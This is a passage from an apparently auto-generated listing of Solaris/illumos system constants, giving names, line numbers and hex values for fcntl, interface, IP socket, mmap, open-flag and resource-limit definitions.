= 0x36 constant F_FLOCKW64 (line 317) | F_FLOCKW64 = 0x36 constant F_FREESP (line 318) | F_FREESP = 0xb constant F_FREESP64 (line 319) | F_FREESP64 = 0xb constant F_GETFD (line 320) | F_GETFD = 0x1 constant F_GETFL (line 321) | F_GETFL = 0x3 constant F_GETLK (line 322) | F_GETLK = 0xe constant F_GETLK64 (line 323) | F_GETLK64 = 0xe constant F_GETOWN (line 324) | F_GETOWN = 0x17 constant F_GETXFL (line 325) | F_GETXFL = 0x2d constant F_HASREMOTELOCKS (line 326) | F_HASREMOTELOCKS = 0x1a constant F_ISSTREAM (line 327) | F_ISSTREAM = 0xd constant F_MANDDNY (line 328) | F_MANDDNY = 0x10 constant F_MDACC (line 329) | F_MDACC = 0x20 constant F_NODNY (line 330) | F_NODNY = 0x0 constant F_NPRIV (line 331) | F_NPRIV = 0x10 constant F_OFD_GETLK (line 332) | F_OFD_GETLK = 0x2f constant F_OFD_GETLK64 (line 333) | F_OFD_GETLK64 = 0x2f constant F_OFD_SETLK (line 334) | F_OFD_SETLK = 0x30 constant F_OFD_SETLK64 (line 335) | F_OFD_SETLK64 = 0x30 constant F_OFD_SETLKW (line 336) | F_OFD_SETLKW = 0x31 constant F_OFD_SETLKW64 (line 337) | F_OFD_SETLKW64 = 0x31 constant F_PRIV (line 338) | F_PRIV = 0xf constant F_QUOTACTL (line 339) | F_QUOTACTL = 0x11 constant F_RDACC (line 340) | F_RDACC = 0x1 constant F_RDDNY (line 341) | F_RDDNY = 0x1 constant F_RDLCK (line 342) | F_RDLCK = 0x1 constant F_REVOKE (line 343) | F_REVOKE = 0x19 constant F_RMACC (line 344) | F_RMACC = 0x4 constant F_RMDNY (line 345) | F_RMDNY = 0x4 constant F_RWACC (line 346) | F_RWACC = 0x3 constant F_RWDNY (line 347) | F_RWDNY = 0x3 constant F_SETFD (line 348) | F_SETFD = 0x2 constant F_SETFL (line 349) | F_SETFL = 0x4 constant F_SETLK (line 350) | F_SETLK = 0x6 constant F_SETLK64 (line 351) | F_SETLK64 = 0x6 constant F_SETLK64_NBMAND (line 352) | F_SETLK64_NBMAND = 0x2a constant F_SETLKW (line 353) | F_SETLKW = 0x7 constant F_SETLKW64 (line 354) | F_SETLKW64 = 0x7 constant F_SETLK_NBMAND (line 355) | F_SETLK_NBMAND = 0x2a constant F_SETOWN (line 356) | F_SETOWN = 0x18 constant F_SHARE (line 357) | F_SHARE = 0x28 constant F_SHARE_NBMAND (line 358) | F_SHARE_NBMAND = 0x2b constant F_UNLCK (line 359) | F_UNLCK = 0x3 constant F_UNLKSYS (line 360) | F_UNLKSYS = 0x4 constant F_UNSHARE (line 361) | F_UNSHARE = 0x29 constant F_WRACC (line 362) | F_WRACC = 0x2 constant F_WRDNY (line 363) | F_WRDNY = 0x2 constant F_WRLCK (line 364) | F_WRLCK = 0x2 constant HUPCL (line 365) | HUPCL = 0x400 constant IBSHIFT (line 366) | IBSHIFT = 0x10 constant ICANON (line 367) | ICANON = 0x2 constant ICMP6_FILTER (line 368) | ICMP6_FILTER = 0x1 constant ICRNL (line 369) | ICRNL = 0x100 constant IEXTEN (line 370) | IEXTEN = 0x8000 constant IFF_ADDRCONF (line 371) | IFF_ADDRCONF = 0x80000 constant IFF_ALLMULTI (line 372) | IFF_ALLMULTI = 0x200 constant IFF_ANYCAST (line 373) | IFF_ANYCAST = 0x400000 constant IFF_BROADCAST (line 374) | IFF_BROADCAST = 0x2 constant IFF_CANTCHANGE (line 375) | IFF_CANTCHANGE = 0x7f203003b5a constant IFF_COS_ENABLED (line 376) | IFF_COS_ENABLED = 0x200000000 constant IFF_DEBUG (line 377) | IFF_DEBUG = 0x4 constant IFF_DEPRECATED (line 378) | IFF_DEPRECATED = 0x40000 constant IFF_DHCPRUNNING (line 379) | IFF_DHCPRUNNING = 0x4000 constant IFF_DUPLICATE (line 380) | IFF_DUPLICATE = 0x4000000000 constant IFF_FAILED (line 381) | IFF_FAILED = 0x10000000 constant IFF_FIXEDMTU (line 382) | IFF_FIXEDMTU = 0x1000000000 constant IFF_INACTIVE (line 383) | IFF_INACTIVE = 0x40000000 constant IFF_INTELLIGENT (line 384) | IFF_INTELLIGENT = 0x400 constant IFF_IPMP (line 385) | IFF_IPMP = 0x8000000000 constant IFF_IPMP_CANTCHANGE (line 386) | IFF_IPMP_CANTCHANGE = 0x10000000 constant IFF_IPMP_INVALID (line 387) | IFF_IPMP_INVALID = 0x1ec200080 constant IFF_IPV4 (line 388) | IFF_IPV4 = 0x1000000 constant IFF_IPV6 (line 389) | IFF_IPV6 = 0x2000000 constant IFF_L3PROTECT (line 390) | IFF_L3PROTECT = 0x40000000000 constant IFF_LOOPBACK (line 391) | IFF_LOOPBACK = 0x8 constant IFF_MULTICAST (line 392) | IFF_MULTICAST = 0x800 constant IFF_MULTI_BCAST (line 393) | IFF_MULTI_BCAST = 0x1000 constant IFF_NOACCEPT (line 394) | IFF_NOACCEPT = 0x4000000 constant IFF_NOARP (line 395) | IFF_NOARP = 0x80 constant IFF_NOFAILOVER (line 396) | IFF_NOFAILOVER = 0x8000000 constant IFF_NOLINKLOCAL (line 397) | IFF_NOLINKLOCAL = 0x20000000000 constant IFF_NOLOCAL (line 398) | IFF_NOLOCAL = 0x20000 constant IFF_NONUD (line 399) | IFF_NONUD = 0x200000 constant IFF_NORTEXCH (line 400) | IFF_NORTEXCH = 0x800000 constant IFF_NOTRAILERS (line 401) | IFF_NOTRAILERS = 0x20 constant IFF_NOXMIT (line 402) | IFF_NOXMIT = 0x10000 constant IFF_OFFLINE (line 403) | IFF_OFFLINE = 0x80000000 constant IFF_POINTOPOINT (line 404) | IFF_POINTOPOINT = 0x10 constant IFF_PREFERRED (line 405) | IFF_PREFERRED = 0x400000000 constant IFF_PRIVATE (line 406) | IFF_PRIVATE = 0x8000 constant IFF_PROMISC (line 407) | IFF_PROMISC = 0x100 constant IFF_ROUTER (line 408) | IFF_ROUTER = 0x100000 constant IFF_RUNNING (line 409) | IFF_RUNNING = 0x40 constant IFF_STANDBY (line 410) | IFF_STANDBY = 0x20000000 constant IFF_TEMPORARY (line 411) | IFF_TEMPORARY = 0x800000000 constant IFF_UNNUMBERED (line 412) | IFF_UNNUMBERED = 0x2000 constant IFF_UP (line 413) | IFF_UP = 0x1 constant IFF_VIRTUAL (line 414) | IFF_VIRTUAL = 0x2000000000 constant IFF_VRRP (line 415) | IFF_VRRP = 0x10000000000 constant IFF_XRESOLV (line 416) | IFF_XRESOLV = 0x100000000 constant IFNAMSIZ (line 417) | IFNAMSIZ = 0x10 constant IFT_1822 (line 418) | IFT_1822 = 0x2 constant IFT_6TO4 (line 419) | IFT_6TO4 = 0xca constant IFT_AAL5 (line 420) | IFT_AAL5 = 0x31 constant IFT_ARCNET (line 421) | IFT_ARCNET = 0x23 constant IFT_ARCNETPLUS (line 422) | IFT_ARCNETPLUS = 0x24 constant IFT_ATM (line 423) | IFT_ATM = 0x25 constant IFT_CEPT (line 424) | IFT_CEPT = 0x13 constant IFT_DS3 (line 425) | IFT_DS3 = 0x1e constant IFT_EON (line 426) | IFT_EON = 0x19 constant IFT_ETHER (line 427) | IFT_ETHER = 0x6 constant IFT_FDDI (line 428) | IFT_FDDI = 0xf constant IFT_FRELAY (line 429) | IFT_FRELAY = 0x20 constant IFT_FRELAYDCE (line 430) | IFT_FRELAYDCE = 0x2c constant IFT_HDH1822 (line 431) | IFT_HDH1822 = 0x3 constant IFT_HIPPI (line 432) | IFT_HIPPI = 0x2f constant IFT_HSSI (line 433) | IFT_HSSI = 0x2e constant IFT_HY (line 434) | IFT_HY = 0xe constant IFT_IB (line 435) | IFT_IB = 0xc7 constant IFT_IPV4 (line 436) | IFT_IPV4 = 0xc8 constant IFT_IPV6 (line 437) | IFT_IPV6 = 0xc9 constant IFT_ISDNBASIC (line 438) | IFT_ISDNBASIC = 0x14 constant IFT_ISDNPRIMARY (line 439) | IFT_ISDNPRIMARY = 0x15 constant IFT_ISO88022LLC (line 440) | IFT_ISO88022LLC = 0x29 constant IFT_ISO88023 (line 441) | IFT_ISO88023 = 0x7 constant IFT_ISO88024 (line 442) | IFT_ISO88024 = 0x8 constant IFT_ISO88025 (line 443) | IFT_ISO88025 = 0x9 constant IFT_ISO88026 (line 444) | IFT_ISO88026 = 0xa constant IFT_LAPB (line 445) | IFT_LAPB = 0x10 constant IFT_LOCALTALK (line 446) | IFT_LOCALTALK = 0x2a constant IFT_LOOP (line 447) | IFT_LOOP = 0x18 constant IFT_MIOX25 (line 448) | IFT_MIOX25 = 0x26 constant IFT_MODEM (line 449) | IFT_MODEM = 0x30 constant IFT_NSIP (line 450) | IFT_NSIP = 0x1b constant IFT_OTHER (line 451) | IFT_OTHER = 0x1 constant IFT_P10 (line 452) | IFT_P10 = 0xc constant IFT_P80 (line 453) | IFT_P80 = 0xd constant IFT_PARA (line 454) | IFT_PARA = 0x22 constant IFT_PPP (line 455) | IFT_PPP = 0x17 constant IFT_PROPMUX (line 456) | IFT_PROPMUX = 0x36 constant IFT_PROPVIRTUAL (line 457) | IFT_PROPVIRTUAL = 0x35 constant IFT_PTPSERIAL (line 458) | IFT_PTPSERIAL = 0x16 constant IFT_RS232 (line 459) | IFT_RS232 = 0x21 constant IFT_SDLC (line 460) | IFT_SDLC = 0x11 constant IFT_SIP (line 461) | IFT_SIP = 0x1f constant IFT_SLIP (line 462) | IFT_SLIP = 0x1c constant IFT_SMDSDXI (line 463) | IFT_SMDSDXI = 0x2b constant IFT_SMDSICIP (line 464) | IFT_SMDSICIP = 0x34 constant IFT_SONET (line 465) | IFT_SONET = 0x27 constant IFT_SONETPATH (line 466) | IFT_SONETPATH = 0x32 constant IFT_SONETVT (line 467) | IFT_SONETVT = 0x33 constant IFT_STARLAN (line 468) | IFT_STARLAN = 0xb constant IFT_T1 (line 469) | IFT_T1 = 0x12 constant IFT_ULTRA (line 470) | IFT_ULTRA = 0x1d constant IFT_V35 (line 471) | IFT_V35 = 0x2d constant IFT_X25 (line 472) | IFT_X25 = 0x5 constant IFT_X25DDN (line 473) | IFT_X25DDN = 0x4 constant IFT_X25PLE (line 474) | IFT_X25PLE = 0x28 constant IFT_XETHER (line 475) | IFT_XETHER = 0x1a constant IGNBRK (line 476) | IGNBRK = 0x1 constant IGNCR (line 477) | IGNCR = 0x80 constant IGNPAR (line 478) | IGNPAR = 0x4 constant IMAXBEL (line 479) | IMAXBEL = 0x2000 constant INLCR (line 480) | INLCR = 0x40 constant INPCK (line 481) | INPCK = 0x10 constant IN_AUTOCONF_MASK (line 482) | IN_AUTOCONF_MASK = 0xffff0000 constant IN_AUTOCONF_NET (line 483) | IN_AUTOCONF_NET = 0xa9fe0000 constant IN_CLASSA_HOST (line 484) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 485) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 486) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 487) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 488) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 489) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 490) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 491) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 492) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 493) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 494) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 495) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 496) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 497) | IN_CLASSD_NSHIFT = 0x1c constant IN_CLASSE_NET (line 498) | IN_CLASSE_NET = 0xffffffff constant IN_LOOPBACKNET (line 499) | IN_LOOPBACKNET = 0x7f constant IN_PRIVATE12_MASK (line 500) | IN_PRIVATE12_MASK = 0xfff00000 constant IN_PRIVATE12_NET (line 501) | IN_PRIVATE12_NET = 0xac100000 constant IN_PRIVATE16_MASK (line 502) | IN_PRIVATE16_MASK = 0xffff0000 constant IN_PRIVATE16_NET (line 503) | IN_PRIVATE16_NET = 0xc0a80000 constant IN_PRIVATE8_MASK (line 504) | IN_PRIVATE8_MASK = 0xff000000 constant IN_PRIVATE8_NET (line 505) | IN_PRIVATE8_NET = 0xa000000 constant IPPROTO_AH (line 506) | IPPROTO_AH = 0x33 constant IPPROTO_DSTOPTS (line 507) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 508) | IPPROTO_EGP = 0x8 constant IPPROTO_ENCAP (line 509) | IPPROTO_ENCAP = 0x4 constant IPPROTO_EON (line 510) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 511) | IPPROTO_ESP = 0x32 constant IPPROTO_FRAGMENT (line 512) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 513) | IPPROTO_GGP = 0x3 constant IPPROTO_HELLO (line 514) | IPPROTO_HELLO = 0x3f constant IPPROTO_HOPOPTS (line 515) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 516) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 517) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 518) | IPPROTO_IDP = 0x16 constant IPPROTO_IGMP (line 519) | IPPROTO_IGMP = 0x2 constant IPPROTO_IP (line 520) | IPPROTO_IP = 0x0 constant IPPROTO_IPV6 (line 521) | IPPROTO_IPV6 = 0x29 constant IPPROTO_MAX (line 522) | IPPROTO_MAX = 0x100 constant IPPROTO_ND (line 523) | IPPROTO_ND = 0x4d constant IPPROTO_NONE (line 524) | IPPROTO_NONE = 0x3b constant IPPROTO_OSPF (line 525) | IPPROTO_OSPF = 0x59 constant IPPROTO_PIM (line 526) | IPPROTO_PIM = 0x67 constant IPPROTO_PUP (line 527) | IPPROTO_PUP = 0xc constant IPPROTO_RAW (line 528) | IPPROTO_RAW = 0xff constant IPPROTO_ROUTING (line 529) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 530) | IPPROTO_RSVP = 0x2e constant IPPROTO_SCTP (line 531) | IPPROTO_SCTP = 0x84 constant IPPROTO_TCP (line 532) | IPPROTO_TCP = 0x6 constant IPPROTO_UDP (line 533) | IPPROTO_UDP = 0x11 constant IPV6_ADD_MEMBERSHIP (line 534) | IPV6_ADD_MEMBERSHIP = 0x9 constant IPV6_BOUND_IF (line 535) | IPV6_BOUND_IF = 0x41 constant IPV6_CHECKSUM (line 536) | IPV6_CHECKSUM = 0x18 constant IPV6_DONTFRAG (line 537) | IPV6_DONTFRAG = 0x21 constant IPV6_DROP_MEMBERSHIP (line 538) | IPV6_DROP_MEMBERSHIP = 0xa constant IPV6_DSTOPTS (line 539) | IPV6_DSTOPTS = 0xf constant IPV6_FLOWINFO_FLOWLABEL (line 540) | IPV6_FLOWINFO_FLOWLABEL = 0xffff0f00 constant IPV6_FLOWINFO_TCLASS (line 541) | IPV6_FLOWINFO_TCLASS = 0xf00f constant IPV6_HOPLIMIT (line 542) | IPV6_HOPLIMIT = 0xc constant IPV6_HOPOPTS (line 543) | IPV6_HOPOPTS = 0xe constant IPV6_JOIN_GROUP (line 544) | IPV6_JOIN_GROUP = 0x9 constant IPV6_LEAVE_GROUP (line 545) | IPV6_LEAVE_GROUP = 0xa constant IPV6_MULTICAST_HOPS (line 546) | IPV6_MULTICAST_HOPS = 0x7 constant IPV6_MULTICAST_IF (line 547) | IPV6_MULTICAST_IF = 0x6 constant IPV6_MULTICAST_LOOP (line 548) | IPV6_MULTICAST_LOOP = 0x8 constant IPV6_NEXTHOP (line 549) | IPV6_NEXTHOP = 0xd constant IPV6_PAD1_OPT (line 550) | IPV6_PAD1_OPT = 0x0 constant IPV6_PATHMTU (line 551) | IPV6_PATHMTU = 0x25 constant IPV6_PKTINFO (line 552) | IPV6_PKTINFO = 0xb constant IPV6_PREFER_SRC_CGA (line 553) | IPV6_PREFER_SRC_CGA = 0x20 constant IPV6_PREFER_SRC_CGADEFAULT (line 554) | IPV6_PREFER_SRC_CGADEFAULT = 0x10 constant IPV6_PREFER_SRC_CGAMASK (line 555) | IPV6_PREFER_SRC_CGAMASK = 0x30 constant IPV6_PREFER_SRC_COA (line 556) | IPV6_PREFER_SRC_COA = 0x2 constant IPV6_PREFER_SRC_DEFAULT (line 557) | IPV6_PREFER_SRC_DEFAULT = 0x15 constant IPV6_PREFER_SRC_HOME (line 558) | IPV6_PREFER_SRC_HOME = 0x1 constant IPV6_PREFER_SRC_MASK (line 559) | IPV6_PREFER_SRC_MASK = 0x3f constant IPV6_PREFER_SRC_MIPDEFAULT (line 560) | IPV6_PREFER_SRC_MIPDEFAULT = 0x1 constant IPV6_PREFER_SRC_MIPMASK (line 561) | IPV6_PREFER_SRC_MIPMASK = 0x3 constant IPV6_PREFER_SRC_NONCGA (line 562) | IPV6_PREFER_SRC_NONCGA = 0x10 constant IPV6_PREFER_SRC_PUBLIC (line 563) | IPV6_PREFER_SRC_PUBLIC = 0x4 constant IPV6_PREFER_SRC_TMP (line 564) | IPV6_PREFER_SRC_TMP = 0x8 constant IPV6_PREFER_SRC_TMPDEFAULT (line 565) | IPV6_PREFER_SRC_TMPDEFAULT = 0x4 constant IPV6_PREFER_SRC_TMPMASK (line 566) | IPV6_PREFER_SRC_TMPMASK = 0xc constant IPV6_RECVDSTOPTS (line 567) | IPV6_RECVDSTOPTS = 0x28 constant IPV6_RECVHOPLIMIT (line 568) | IPV6_RECVHOPLIMIT = 0x13 constant IPV6_RECVHOPOPTS (line 569) | IPV6_RECVHOPOPTS = 0x14 constant IPV6_RECVPATHMTU (line 570) | IPV6_RECVPATHMTU = 0x24 constant IPV6_RECVPKTINFO (line 571) | IPV6_RECVPKTINFO = 0x12 constant IPV6_RECVRTHDR (line 572) | IPV6_RECVRTHDR = 0x16 constant IPV6_RECVRTHDRDSTOPTS (line 573) | IPV6_RECVRTHDRDSTOPTS = 0x17 constant IPV6_RECVTCLASS (line 574) | IPV6_RECVTCLASS = 0x19 constant IPV6_RTHDR (line 575) | IPV6_RTHDR = 0x10 constant IPV6_RTHDRDSTOPTS (line 576) | IPV6_RTHDRDSTOPTS = 0x11 constant IPV6_RTHDR_TYPE_0 (line 577) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_SEC_OPT (line 578) | IPV6_SEC_OPT = 0x22 constant IPV6_SRC_PREFERENCES (line 579) | IPV6_SRC_PREFERENCES = 0x23 constant IPV6_TCLASS (line 580) | IPV6_TCLASS = 0x26 constant IPV6_UNICAST_HOPS (line 581) | IPV6_UNICAST_HOPS = 0x5 constant IPV6_UNSPEC_SRC (line 582) | IPV6_UNSPEC_SRC = 0x42 constant IPV6_USE_MIN_MTU (line 583) | IPV6_USE_MIN_MTU = 0x20 constant IPV6_V6ONLY (line 584) | IPV6_V6ONLY = 0x27 constant IP_ADD_MEMBERSHIP (line 585) | IP_ADD_MEMBERSHIP = 0x13 constant IP_ADD_SOURCE_MEMBERSHIP (line 586) | IP_ADD_SOURCE_MEMBERSHIP = 0x17 constant IP_BLOCK_SOURCE (line 587) | IP_BLOCK_SOURCE = 0x15 constant IP_BOUND_IF (line 588) | IP_BOUND_IF = 0x41 constant IP_BROADCAST (line 589) | IP_BROADCAST = 0x106 constant IP_BROADCAST_TTL (line 590) | IP_BROADCAST_TTL = 0x43 constant IP_DEFAULT_MULTICAST_LOOP (line 591) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 592) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 593) | IP_DF = 0x4000 constant IP_DHCPINIT_IF (line 594) | IP_DHCPINIT_IF = 0x45 constant IP_DONTFRAG (line 595) | IP_DONTFRAG = 0x1b constant IP_DONTROUTE (line 596) | IP_DONTROUTE = 0x105 constant IP_DROP_MEMBERSHIP (line 597) | IP_DROP_MEMBERSHIP = 0x14 constant IP_DROP_SOURCE_MEMBERSHIP (line 598) | IP_DROP_SOURCE_MEMBERSHIP = 0x18 constant IP_HDRINCL (line 599) | IP_HDRINCL = 0x2 constant IP_MAXPACKET (line 600) | IP_MAXPACKET = 0xffff constant IP_MF (line 601) | IP_MF = 0x2000 constant IP_MSS (line 602) | IP_MSS = 0x240 constant IP_MULTICAST_IF (line 603) | IP_MULTICAST_IF = 0x10 constant IP_MULTICAST_LOOP (line 604) | IP_MULTICAST_LOOP = 0x12 constant IP_MULTICAST_TTL (line 605) | IP_MULTICAST_TTL = 0x11 constant IP_NEXTHOP (line 606) | IP_NEXTHOP = 0x19 constant IP_OPTIONS (line 607) | IP_OPTIONS = 0x1 constant IP_PKTINFO (line 608) | IP_PKTINFO = 0x1a constant IP_RECVDSTADDR (line 609) | IP_RECVDSTADDR = 0x7 constant IP_RECVIF (line 610) | IP_RECVIF = 0x9 constant IP_RECVOPTS (line 611) | IP_RECVOPTS = 0x5 constant IP_RECVPKTINFO (line 612) | IP_RECVPKTINFO = 0x1a constant IP_RECVRETOPTS (line 613) | IP_RECVRETOPTS = 0x6 constant IP_RECVSLLA (line 614) | IP_RECVSLLA = 0xa constant IP_RECVTOS (line 615) | IP_RECVTOS = 0xc constant IP_RECVTTL (line 616) | IP_RECVTTL = 0xb constant IP_RETOPTS (line 617) | IP_RETOPTS = 0x8 constant IP_REUSEADDR (line 618) | IP_REUSEADDR = 0x104 constant IP_SEC_OPT (line 619) | IP_SEC_OPT = 0x22 constant IP_TOS (line 620) | IP_TOS = 0x3 constant IP_TTL (line 621) | IP_TTL = 0x4 constant IP_UNBLOCK_SOURCE (line 622) | IP_UNBLOCK_SOURCE = 0x16 constant IP_UNSPEC_SRC (line 623) | IP_UNSPEC_SRC = 0x42 constant ISIG (line 624) | ISIG = 0x1 constant ISTRIP (line 625) | ISTRIP = 0x20 constant IUCLC (line 626) | IUCLC = 0x200 constant IXANY (line 627) | IXANY = 0x800 constant IXOFF (line 628) | IXOFF = 0x1000 constant IXON (line 629) | IXON = 0x400 constant LOCK_EX (line 630) | LOCK_EX = 0x2 constant LOCK_NB (line 631) | LOCK_NB = 0x4 constant LOCK_SH (line 632) | LOCK_SH = 0x1 constant LOCK_UN (line 633) | LOCK_UN = 0x8 constant MADV_ACCESS_DEFAULT (line 634) | MADV_ACCESS_DEFAULT = 0x6 constant MADV_ACCESS_LWP (line 635) | MADV_ACCESS_LWP = 0x7 constant MADV_ACCESS_MANY (line 636) | MADV_ACCESS_MANY = 0x8 constant MADV_DONTNEED (line 637) | MADV_DONTNEED = 0x4 constant MADV_FREE (line 638) | MADV_FREE = 0x5 constant MADV_NORMAL (line 639) | MADV_NORMAL = 0x0 constant MADV_PURGE (line 640) | MADV_PURGE = 0x9 constant MADV_RANDOM (line 641) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 642) | MADV_SEQUENTIAL = 0x2 constant MADV_WILLNEED (line 643) | MADV_WILLNEED = 0x3 constant MAP_32BIT (line 644) | MAP_32BIT = 0x80 constant MAP_ALIGN (line 645) | MAP_ALIGN = 0x200 constant MAP_ANON (line 646) | MAP_ANON = 0x100 constant MAP_ANONYMOUS (line 647) | MAP_ANONYMOUS = 0x100 constant MAP_FILE (line 648) | MAP_FILE = 0x0 constant MAP_FIXED (line 649) | MAP_FIXED = 0x10 constant MAP_INITDATA (line 650) | MAP_INITDATA = 0x800 constant MAP_NORESERVE (line 651) | MAP_NORESERVE = 0x40 constant MAP_PRIVATE (line 652) | MAP_PRIVATE = 0x2 constant MAP_RENAME (line 653) | MAP_RENAME = 0x20 constant MAP_SHARED (line 654) | MAP_SHARED = 0x1 constant MAP_TEXT (line 655) | MAP_TEXT = 0x400 constant MAP_TYPE (line 656) | MAP_TYPE = 0xf constant MCAST_BLOCK_SOURCE (line 657) | MCAST_BLOCK_SOURCE = 0x2b constant MCAST_EXCLUDE (line 658) | MCAST_EXCLUDE = 0x2 constant MCAST_INCLUDE (line 659) | MCAST_INCLUDE = 0x1 constant MCAST_JOIN_GROUP (line 660) | MCAST_JOIN_GROUP = 0x29 constant MCAST_JOIN_SOURCE_GROUP (line 661) | MCAST_JOIN_SOURCE_GROUP = 0x2d constant MCAST_LEAVE_GROUP (line 662) | MCAST_LEAVE_GROUP = 0x2a constant MCAST_LEAVE_SOURCE_GROUP (line 663) | MCAST_LEAVE_SOURCE_GROUP = 0x2e constant MCAST_UNBLOCK_SOURCE (line 664) | MCAST_UNBLOCK_SOURCE = 0x2c constant MCL_CURRENT (line 665) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 666) | MCL_FUTURE = 0x2 constant MSG_CTRUNC (line 667) | MSG_CTRUNC = 0x10 constant MSG_DONTROUTE (line 668) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 669) | MSG_DONTWAIT = 0x80 constant MSG_DUPCTRL (line 670) | MSG_DUPCTRL = 0x800 constant MSG_EOR (line 671) | MSG_EOR = 0x8 constant MSG_MAXIOVLEN (line 672) | MSG_MAXIOVLEN = 0x10 constant MSG_NOSIGNAL (line 673) | MSG_NOSIGNAL = 0x200 constant MSG_NOTIFICATION (line 674) | MSG_NOTIFICATION = 0x100 constant MSG_OOB (line 675) | MSG_OOB = 0x1 constant MSG_PEEK (line 676) | MSG_PEEK = 0x2 constant MSG_TRUNC (line 677) | MSG_TRUNC = 0x20 constant MSG_WAITALL (line 678) | MSG_WAITALL = 0x40 constant MSG_XPG4_2 (line 679) | MSG_XPG4_2 = 0x8000 constant MS_ASYNC (line 680) | MS_ASYNC = 0x1 constant MS_INVALIDATE (line 681) | MS_INVALIDATE = 0x2 constant MS_OLDSYNC (line 682) | MS_OLDSYNC = 0x0 constant MS_SYNC (line 683) | MS_SYNC = 0x4 constant M_FLUSH (line 684) | M_FLUSH = 0x86 constant NAME_MAX (line 685) | NAME_MAX = 0xff constant NEWDEV (line 686) | NEWDEV = 0x1 constant NFDBITS (line 687) | NFDBITS = 0x40 constant NL0 (line 688) | NL0 = 0x0 constant NL1 (line 689) | NL1 = 0x100 constant NLDLY (line 690) | NLDLY = 0x100 constant NOFLSH (line 691) | NOFLSH = 0x80 constant OCRNL (line 692) | OCRNL = 0x8 constant OFDEL (line 693) | OFDEL = 0x80 constant OFILL (line 694) | OFILL = 0x40 constant OLCUC (line 695) | OLCUC = 0x2 constant OLDDEV (line 696) | OLDDEV = 0x0 constant ONBITSMAJOR (line 697) | ONBITSMAJOR = 0x7 constant ONBITSMINOR (line 698) | ONBITSMINOR = 0x8 constant ONLCR (line 699) | ONLCR = 0x4 constant ONLRET (line 700) | ONLRET = 0x20 constant ONOCR (line 701) | ONOCR = 0x10 constant OPENFAIL (line 702) | OPENFAIL = -0x1 constant OPOST (line 703) | OPOST = 0x1 constant O_ACCMODE (line 704) | O_ACCMODE = 0x600003 constant O_APPEND (line 705) | O_APPEND = 0x8 constant O_CLOEXEC (line 706) | O_CLOEXEC = 0x800000 constant O_CREAT (line 707) | O_CREAT = 0x100 constant O_DIRECT (line 708) | O_DIRECT = 0x2000000 constant O_DIRECTORY (line 709) | O_DIRECTORY = 0x1000000 constant O_DSYNC (line 710) | O_DSYNC = 0x40 constant O_EXCL (line 711) | O_EXCL = 0x400 constant O_EXEC (line 712) | O_EXEC = 0x400000 constant O_LARGEFILE (line 713) | O_LARGEFILE = 0x2000 constant O_NDELAY (line 714) | O_NDELAY = 0x4 constant O_NOCTTY (line 715) | O_NOCTTY = 0x800 constant O_NOFOLLOW (line 716) | O_NOFOLLOW = 0x20000 constant O_NOLINKS (line 717) | O_NOLINKS = 0x40000 constant O_NONBLOCK (line 718) | O_NONBLOCK = 0x80 constant O_RDONLY (line 719) | O_RDONLY = 0x0 constant O_RDWR (line 720) | O_RDWR = 0x2 constant O_RSYNC (line 721) | O_RSYNC = 0x8000 constant O_SEARCH (line 722) | O_SEARCH = 0x200000 constant O_SIOCGIFCONF (line 723) | O_SIOCGIFCONF = -0x3ff796ec constant O_SIOCGLIFCONF (line 724) | O_SIOCGLIFCONF = -0x3fef9688 constant O_SYNC (line 725) | O_SYNC = 0x10 constant O_TRUNC (line 726) | O_TRUNC = 0x200 constant O_WRONLY (line 727) | O_WRONLY = 0x1 constant O_XATTR (line 728) | O_XATTR = 0x4000 constant PARENB (line 729) | PARENB = 0x100 constant PAREXT (line 730) | PAREXT = 0x100000 constant PARMRK (line 731) | PARMRK = 0x8 constant PARODD (line 732) | PARODD = 0x200 constant PENDIN (line 733) | PENDIN = 0x4000 constant PRIO_PGRP (line 734) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 735) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 736) | PRIO_USER = 0x2 constant PROT_EXEC (line 737) | PROT_EXEC = 0x4 constant PROT_NONE (line 738) | PROT_NONE = 0x0 constant PROT_READ (line 739) | PROT_READ = 0x1 constant PROT_WRITE (line 740) | PROT_WRITE = 0x2 constant RLIMIT_AS (line 741) | RLIMIT_AS = 0x6 constant RLIMIT_CORE (line 742) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 743) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 744) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 745) | RLIMIT_FSIZE = 0x1 constant RLIMIT_NOFILE (line 746) | RLIMIT_NOFILE = 0x5 constant RLIMIT_STACK (line 747) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 748) | RLIM_INFINITY = 0xfffffffffffffffd constant RTAX_AUTHOR (line 749) | RTAX_AUTHOR = 0x6 constant RTAX_BRD (line 750) | 